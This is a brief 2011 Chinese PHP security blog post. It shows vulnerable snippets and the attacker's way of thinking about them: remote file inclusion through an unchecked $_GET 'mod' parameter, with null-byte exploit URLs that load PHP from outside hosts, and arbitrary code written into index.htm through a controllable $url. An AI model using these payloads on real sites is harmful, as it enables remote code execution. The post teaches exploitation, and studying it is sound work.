PHP安全新闻早8点_1119

//2011-11-19 星期六 
//程序员的思维 
//Micropoor.php代码片段 
<?php 
//略 
$modd=$_GET[mod];        
 … if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){ 
      require_once './source/module/$modd.php'; 
//略 
} 
//我们的思维 
index.php?mod=http://www.cnblogs.com/1.php%00 
//其他条件 
php.ini 
allow_url_fopen=on 
//我们的思维 
index.php?mod=http://hi.baidu.com/micropoor//att.php%00 
//程序员的思维 
//Micropoor.php代码片段 
<?php 
$file=file_get_contents($url);  
$newfile=fopen('Index.htm','w');  
fwrite($newfile,$file);  
fclose($newfile);  
?> 
//我们的思维 
控制$url变量，写入任意代码进index.htm 
$url变量假如不可控制 
利用第三方网站

posted @ 2011-11-19 23:01 noevil 阅读(143) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Think Different!

今天只谈技术.

PHP安全新闻早8点_1119

公告